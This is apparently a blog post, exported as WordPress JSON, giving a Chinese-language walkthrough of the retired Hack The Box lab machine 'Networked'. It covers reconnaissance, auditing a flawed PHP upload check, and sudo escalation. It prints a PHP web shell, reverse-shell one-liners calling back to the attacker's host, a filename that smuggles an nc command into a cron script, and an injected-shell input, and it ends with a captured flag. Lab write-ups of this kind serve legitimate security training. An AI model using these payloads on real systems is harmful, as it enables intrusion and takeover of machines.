{"id":122,"date":"2024-11-13T09:31:06","date_gmt":"2024-11-13T01:31:06","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=122"},"modified":"2024-11-13T09:49:41","modified_gmt":"2024-11-13T01:49:41","slug":"htb_machine_networked","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_networked\/","title":{"rendered":"HTB\u9776\u673a Networked \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.146<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/networked\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.146\nPING 10.10.10.146 (10.10.10.146) 56(84) bytes of data.\n64 bytes from 10.10.10.146: icmp_seq=1 ttl=63 time=304 ms\n64 bytes from 10.10.10.146: icmp_seq=2 ttl=63 time=304 ms\n64 bytes from 10.10.10.146: icmp_seq=3 ttl=63 time=313 ms\n64 bytes from 10.10.10.146: icmp_seq=4 ttl=63 time=304 ms\n\n--- 10.10.10.146 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3220ms\nrtt min\/avg\/max\/mdev = 303.525\/306.134\/312.938\/3.936 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u6b63\u5e38\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Fri Jul 19 08:33:45 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_result.txt 10.10.10.146\nNmap scan report for 10.10.10.146 (10.10.10.146)\nHost is up (0.30s latency).\nNot shown: 65463 filtered tcp ports (no-response), 69 filtered tcp ports (host-prohibited)\nPORT    STATE      SERVICE\n22\/tcp  unfiltered ssh\n80\/tcp  unfiltered http\n443\/tcp unfiltered https\n\n# Nmap done at Fri Jul 19 08:34:52 2024 -- 1 IP address (1 host up) scanned in 66.58 seconds<\/code><\/pre>\n
\u9776\u673a\u5f00\u653e\u4e863<\/code>\u4e2aTCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Fri Jul 19 08:36:00 2024 as: nmap -sS -sV -A -p 22,80,443 -oN .\/tcp_report.txt 10.10.10.146\nNmap scan report for 10.10.10.146 (10.10.10.146)\nHost is up (0.31s latency).\n\nPORT    STATE  SERVICE VERSION\n22\/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)\n| ssh-hostkey: \n|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)\n|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)\n|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)\n80\/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP\/5.4.16)\n|_http-title: Site doesn't have a title (text\/html; charset=UTF-8).\n|_http-server-header: Apache\/2.4.6 (CentOS) PHP\/5.4.16\n443\/tcp closed https\nAggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 5.0 (91%), Linux 5.1 (90%), Linux 3.2 - 4.9 (89%), Linux 3.13 (88%), Linux 3.13 or 4.2 (88%), Linux 4.10 (88%), Linux 4.2 (88%), Linux 4.4 (88%), Asus RT-AC66U WAP (88%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   304.99 ms 10.10.14.1 (10.10.14.1)\n2   305.45 ms 10.10.10.146 (10.10.10.146)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jul 19 08:36:29 2024 -- 1 IP address (1 host up) scanned in 29.36 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Fri Jul 19 08:41:30 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.146\nWarning: 10.10.10.146 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.146 (10.10.10.146)\nHost is up (0.30s latency).\nAll 65535 scanned ports on 10.10.10.146 (10.10.10.146) are in ignored states.\nNot shown: 65178 open|filtered udp ports (no-response), 357 filtered udp ports (host-prohibited)\n\n# Nmap done at Fri Jul 19 08:47:31 2024 -- 1 IP address (1 host up) scanned in 361.57 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aCentOS Linux<\/code>\uff0c\u5e76\u6000\u7591\u9776\u673a\u5b58\u5728\u7aef\u53e3\u6572\u95e8\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/networked\/nmap_reports]\n\u2514\u2500# nc -nv 10.10.10.146 22\n(UNKNOWN) [10.10.10.146] 22 (ssh) open\nSSH-2.0-OpenSSH_7.4<\/code><\/pre>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/networked.htb\/<\/code><\/p>\n
<html>\n<body>\nHello mate, we're building the new FaceMash!<\/br>\nHelp by funding us and be the new Tyler&Cameron!<\/br>\nJoin us at the pool party this Sat to get a glimpse\n<!-- upload and gallery not yet linked -->\n<\/body>\n<\/html><\/code><\/pre>\n
\u5728\u4e3b\u9875\u4e0a\u53d1\u73b0\u51e0\u4e2a\u7591\u4f3c\u4eba\u540d\u7684\u8bcd\uff0c\u5c06\u5176\u4f7f\u7528cewl<\/code>\u5de5\u5177\u4fdd\u5b58\u3002<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Fri Jul 19 08:57:03 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/networked.htb\/ -x 400,403,404 -t 60 -e php,js,html,asp,aspx,txt,zip,tar.gz,pcap\n\n301   236B   http:\/\/networked.htb\/backup    -> REDIRECTS TO: http:\/\/networked.htb\/backup\/\n200   885B   http:\/\/networked.htb\/backup\/\n200     1KB  http:\/\/networked.htb\/photos.php\n301   237B   http:\/\/networked.htb\/uploads    -> REDIRECTS TO: http:\/\/networked.htb\/uploads\/\n200   169B   http:\/\/networked.htb\/upload.php\n200     2B   http:\/\/networked.htb\/uploads\/<\/code><\/pre>\n
\u53d1\u73b0\/upload.php<\/code>\u4e3a\u4e0a\u4f20\u6587\u4ef6\u754c\u9762\uff1a<\/p>\n
\"\"<\/p>\n
\u540c\u65f6\u5728\/backup<\/code>\u76ee\u5f55\u4e2d\u53d1\u73b0\u4e86backup.tar<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u4e3a\u7f51\u7ad9\u7684\u5907\u4efd\u538b\u7f29\u5305\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u4ee3\u7801\u5ba1\u8ba1<\/h2>\n
upload.php<\/code>\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
<?php\nrequire '\/var\/www\/html\/lib.php';\n\ndefine(\"UPLOAD_DIR\", \"\/var\/www\/html\/uploads\/\");\n\nif( isset($_POST['submit']) ) {\n  if (!empty($_FILES[\"myFile\"])) {\n    $myFile = $_FILES[\"myFile\"];\n\n    if (!(check_file_type($_FILES[\"myFile\"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {\n      echo '<pre>Invalid image file.<\/pre>';\n      displayform();\n    }\n\n    if ($myFile[\"error\"] !== UPLOAD_ERR_OK) {\n        echo \"<p>An error occurred.<\/p>\";\n        displayform();\n        exit;\n    }\n\n    \/\/$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile[\"name\"];\n    list ($foo,$ext) = getnameUpload($myFile[\"name\"]);\n    $validext = array('.jpg', '.png', '.gif', '.jpeg');\n    $valid = false;\n    foreach ($validext as $vext) {\n      if (substr_compare($myFile[\"name\"], $vext, -strlen($vext)) === 0) {\n        $valid = true;\n      }\n    }\n\n    if (!($valid)) {\n      echo \"<p>Invalid image file<\/p>\";\n      displayform();\n      exit;\n    }\n    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;\n\n    $success = move_uploaded_file($myFile[\"tmp_name\"], UPLOAD_DIR . $name);\n    if (!$success) {\n        echo \"<p>Unable to save file.<\/p>\";\n        exit;\n    }\n    echo \"<p>file uploaded, refresh gallery<\/p>\";\n\n    \/\/ set proper permissions on the new file\n    chmod(UPLOAD_DIR . $name, 0644);\n  }\n} else {\n  displayform();\n}\n?><\/code><\/pre>\n
lib.php<\/code>\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
<?php\n\nfunction getnameCheck($filename) {\n  $pieces = explode('.',$filename);\n  $name= array_shift($pieces);\n  $name = str_replace('_','.',$name);\n  $ext = implode('.',$pieces);\n  #echo \"name $name - ext $extn\";\n  return array($name,$ext);\n}\n\nfunction getnameUpload($filename) {\n  $pieces = explode('.',$filename);\n  $name= array_shift($pieces);\n  $name = str_replace('_','.',$name);\n  $ext = implode('.',$pieces);\n  return array($name,$ext);\n}\n\nfunction check_ip($prefix,$filename) {\n  \/\/echo \"prefix: $prefix - fname: $filename<br>n\";\n  $ret = true;\n  if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {\n    $ret = false;\n    $msg = \"4tt4ck on file \".$filename.\": prefix is not a valid ip \";\n  } else {\n    $msg = $filename;\n  }\n  return array($ret,$msg);\n}\n\nfunction file_mime_type($file) {\n  $regexp = '\/^([a-z-]+\/[a-z0-9-.+]+)(;s.+)?$\/';\n  if (function_exists('finfo_file')) {\n    $finfo = finfo_open(FILEINFO_MIME);\n    if (is_resource($finfo)) \/\/ It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system\n    {\n      $mime = @finfo_file($finfo, $file['tmp_name']);\n      finfo_close($finfo);\n      if (is_string($mime) && preg_match($regexp, $mime, $matches)) {\n        $file_type = $matches[1];\n        return $file_type;\n      }\n    }\n  }\n  if (function_exists('mime_content_type'))\n  {\n    $file_type = @mime_content_type($file['tmp_name']);\n    if (strlen($file_type) > 0) \/\/ It's possible that mime_content_type() returns FALSE or an empty string\n    {\n      return $file_type;\n    }\n  }\n  return $file['type'];\n}\n\nfunction check_file_type($file) {\n  $mime_type = file_mime_type($file);\n  if (strpos($mime_type, 'image\/') === 0) {\n      return true;\n  } else {\n      return false;\n  }  \n}\n\nfunction displayform() {\n?>\n<form action=\"<?php echo $_SERVER['PHP_SELF']; ?>\" method=\"post\" enctype=\"multipart\/form-data\">\n <input type=\"file\" name=\"myFile\">\n <br>\n<input type=\"submit\" name=\"submit\" value=\"go!\">\n<\/form>\n<?php\n  exit();\n}\n\n?><\/code><\/pre>\n
\u901a\u8bfbupload.php<\/code>\uff0c\u53d1\u73b0\u8be5\u7a0b\u5e8f\u9996\u5148\u63a5\u6536\u4e86myFile<\/code>\u6587\u4ef6\u5bf9\u8c61\uff0c\u968f\u540e\u6839\u636e\u6587\u4ef6\u5934\u90e8\u68c0\u67e5\u4e86\u6587\u4ef6\u7684MIME<\/code>\u7c7b\u578b\u662f\u5426\u5408\u6cd5\uff0c\u63a5\u7740\u4f7f\u7528getnameUpload()<\/code>\u51fd\u6570\u83b7\u53d6\u4e86\u6587\u4ef6\u540d\u548c\u6269\u5c55\u540d\u3002\u83b7\u53d6\u4ee5\u4e0a\u4fe1\u606f\u4e4b\u540e\uff0c\u5b9a\u4e49\u4e86\u4e00\u4e2a\u767d\u540d\u5355\u6269\u5c55\u540d\u5217\u8868$validext<\/code>\uff0c\u4f46\u662f\u7d27\u63a5\u7740\uff0c\u7a0b\u5e8f\u5e76\u6ca1\u6709\u4f7f\u7528\u83b7\u53d6\u7684\u6269\u5c55\u540d\uff0c\u800c\u662f\u76f4\u63a5\u4f7f\u7528\u672a\u7ecf\u5904\u7406\u7684myFile<\/code>\u5bf9\u8c61\u7684\u6587\u4ef6\u540d\u4f5c\u4e3a\u68c0\u67e5\u76ee\u6807\uff0c\u4f7f\u7528foreach<\/code>\u904d\u5386\u767d\u540d\u5355\u5217\u8868\uff0c\u540c\u65f6\u4f7f\u7528substr_compare()<\/code>\u51fd\u6570\u5c06\u6587\u4ef6\u540d\u548c\u767d\u540d\u5355\u8fdb\u884c\u6bd4\u8f83\uff0c\u5f00\u59cb\u4f4d\u7f6e\u4e3a-4<\/code>\u3002\u8fd9\u610f\u5473\u7740\u5982\u679c\u6587\u4ef6\u62e5\u6709\u53cc\u6269\u5c55\u540d\uff0c\u5219\u8be5\u529f\u80fd\u53ea\u4f1a\u6bd4\u8f83\u6700\u540e\u4e00\u4e2a\u6269\u5c55\u540d\u3002\u4f8b\u5b50\u5982\u4e0b\uff1a<\/p>\n
<?php\n  echo substr_compare(\"test.php.jpg\",\".jpg\",-4);  \/\/ Result: 0\n?><\/code><\/pre>\n
Apache<\/code>\u670d\u52a1\u5668\u6709\u4e00\u4e2a\u7279\u6027\uff1a\u89e3\u6790\u6587\u4ef6\u65f6\uff0c\u4f1a\u6839\u636e\u6587\u4ef6\u540d\u4ece\u540e\u5f80\u524d\u89e3\u6790\u6587\u4ef6\u6269\u5c55\u540d\u3002\u5728\u4e0a\u8ff0\u4f8b\u5b50\u4e2d\uff0ctest.php.jpg<\/code>\u6700\u7ec8\u4f1a\u88ab\u89e3\u6790\u4e3atest.php<\/code>\uff0c\u56e0\u4e3a.jpg<\/code>\u6587\u4ef6\u65e0\u6cd5\u88abApache<\/code>\u89e3\u6790\u3002<\/p>\n
\u5c1d\u8bd5\u4e0a\u4f20\u5982\u4e0b\u6728\u9a6c\u6587\u4ef6\uff1a<\/p>\n
<?php\n    $command = $_GET['cmd'];\n    if (isset($command) && !empty($command)) {\n        system($command);\n    } else {\n        die(\"Hello, hello, I'm sparkle!\");\n    }\n?><\/code><\/pre>\n
\u6d41\u91cf\u5305\u5982\u4e0b\uff1a<\/p>\n
POST \/upload.php HTTP\/1.1\nHost: networked.htb\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nContent-Type: multipart\/form-data; boundary=---------------------------74254116618505709162113301400\nContent-Length: 529\nOrigin: http:\/\/networked.htb\nConnection: keep-alive\nReferer: http:\/\/networked.htb\/upload.php\nUpgrade-Insecure-Requests: 1\n\n-----------------------------74254116618505709162113301400\nContent-Disposition: form-data; name=\"myFile\"; filename=\"sparkle.php.jpg\"\nContent-Type: image\/jpeg\n\nGIF89a\n<?php\n    $command = $_GET['cmd'];\n    if (isset($command) && !empty($command)) {\n        system($command);\n    } else {\n        die(\"Hello, hello, I'm sparkle!\");\n    }\n?>\n\n-----------------------------74254116618505709162113301400\nContent-Disposition: form-data; name=\"submit\"\n\ngo!\n-----------------------------74254116618505709162113301400--<\/code><\/pre>\n
\u968f\u540e\u6253\u5f00\u6728\u9a6c\uff1ahttp:\/\/networked.htb\/uploads\/10_10_14_3.php.jpg<\/code><\/p>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01<\/strong><\/p>\n
\u76f4\u63a5\u53cd\u5f39Shell\uff1a<\/p>\n
\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.3\/443 0>&1'<\/code><\/pre>\n
\"\"<\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
\u8ba1\u5212\u4efb\u52a1\u63d0\u6743\u81f3guly<\/h2>\n
\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u5728\/home\/guly<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u654f\u611f\u6587\u4ef6crontab.guly<\/code>\u548cPHP\u811a\u672ccheck_attack.php<\/code>\uff0c\u5176\u4e2d\u811a\u672c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
<?php\nrequire '\/var\/www\/html\/lib.php';\n$path = '\/var\/www\/html\/uploads\/';\n$logpath = '\/tmp\/attack.log';\n$to = 'guly';\n$msg= '';\n$headers = \"X-Mailer: check_attack.phprn\";\n\n$files = array();\n$files = preg_grep('\/^([^.])\/', scandir($path));\n\nforeach ($files as $key => $value) {\n        $msg='';\n  if ($value == 'index.html') {\n        continue;\n  }\n  #echo \"-------------n\";\n\n  #print \"check: $valuen\";\n  list ($name,$ext) = getnameCheck($value);\n  $check = check_ip($name,$value);\n\n  if (!($check[0])) {\n    echo \"attack!n\";\n    # todo: attach file\n    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);\n\n    exec(\"rm -f $logpath\");\n    exec(\"nohup \/bin\/rm -f $path$value > \/dev\/null 2>&1 &\");\n    echo \"rm -f $path$valuen\";\n    mail($to, $msg, $msg, $headers, \"-F$value\");\n  }\n}\n\n?><\/code><\/pre>\n
\u53d1\u73b0\u8be5\u811a\u672c\u7684\u529f\u80fd\u662f\u83b7\u53d6Web<\/code>\u4e0a\u4f20\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\u5217\u8868\uff0c\u968f\u540e\u4f7f\u7528getnameCheck()<\/code>\u51fd\u6570\u83b7\u53d6\u5176\u6587\u4ef6\u540d\u548c\u6269\u5c55\u540d\uff0c\u63a5\u7740\u4f7f\u7528check_ip()<\/code>\u51fd\u6570\u68c0\u67e5\u6587\u4ef6\u540d\u662f\u5426\u5927\u81f4\u7b26\u5408IP<\/code>\u5730\u5740\u683c\u5f0f\uff0c\u5982\u679c\u4e0d\u7b26\u5408\u5219\u8f93\u51fa\u62a5\u9519\u65e5\u5fd7\uff0c\u5e76\u8c03\u7528exec<\/code>\u547d\u4ee4\u6267\u884crm -f<\/code>\u547d\u4ee4\uff0c\u5982\u679c\u6587\u4ef6\u5168\u90e8\u68c0\u67e5\u901a\u8fc7\u5219\u9000\u51fa\u3002\u7531\u4e8e\u7a0b\u5e8f\u8c03\u7528<\/strong>exec()<\/code>\u51fd\u6570\u5220\u9664\u7591\u4f3c\u6728\u9a6c\u65f6\uff0c\u76f4\u63a5\u5c06\u6587\u4ef6\u8def\u5f84\u548c\u6587\u4ef6\u540d\u62fc\u63a5\u4e86\u8fdb\u53bb\uff0c\u56e0\u6b64\u8fd9\u91cc\u5f62\u6210\u4e86\u4e00\u4e2a\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002<\/strong><\/p>\n
\u76f4\u63a5\u5728\/var\/www\/html\/uploads<\/code>\u76ee\u5f55\u4e0b\u65b0\u5efa\u6587\u4ef6abc;nc -c bash 10.10.14.3 4444;echo<\/code>\uff0c\u8fdb\u884c\u547d\u4ee4\u62fc\u63a5\uff1a<\/p>\n
touch \"abc;nc -c bash 10.10.14.3 4444;echo\"<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01<\/strong><\/p>\n
Sudo PATH\u63d0\u6743<\/h2>\n
\u8fdb\u5165guly<\/code>\u7528\u6237\u4e4b\u540e\uff0c\u5c1d\u8bd5\u67e5\u770b\u5176Sudo<\/code>\u6743\u9650\uff0c\u53d1\u73b0\u8be5\u7528\u6237\u53ef\u4ee5\u514d\u5bc6\u4ee5root<\/code>\u8eab\u4efd\u8fd0\u884c\u811a\u672c\/usr\/local\/sbin\/changename.sh<\/code>\uff1a<\/p>\n
#!\/bin\/bash -p\ncat > \/etc\/sysconfig\/network-scripts\/ifcfg-guly << EoF\nDEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\nEoF\n\nregexp=\"^[a-zA-Z0-9_ \/-]+$\"\n\nfor var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do\n        echo \"interface $var:\"\n        read x\n        while [[ ! $x =~ $regexp ]]; do\n                echo \"wrong input, try again\"\n                echo \"interface $var:\"\n                read x\n        done\n        echo $var=$x >> \/etc\/sysconfig\/network-scripts\/ifcfg-guly\ndone\n\n\/sbin\/ifup guly0<\/code><\/pre>\n
\u53d1\u73b0\u8be5\u811a\u672c\u7b2c18<\/code>\u884c\u5728echo<\/code>\u547d\u4ee4\u4e4b\u540e\u76f4\u63a5\u62fc\u63a5\u4e86\u8f93\u5165\u7684\u5185\u5bb9\uff0c\u76f4\u63a5\u8f93\u5165\u5982\u4e0b\u5185\u5bb9\u62fc\u63a5bash<\/code>\u547d\u4ee4\uff1a<\/p>\n
asd \/bin\/bash<\/code><\/pre>\n
\"\"<\/p>\n
\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
\n
Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
4e5dc97ca2c1b479d1a89a81c4677ef4<\/code><\/pre>\n
\n
\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
\n","protected":false},"excerpt":{"rendered":"
\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.146 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-122","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=122"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/122\/revisions"}],"predecessor-version":[{"id":123,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/122\/revisions\/123"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}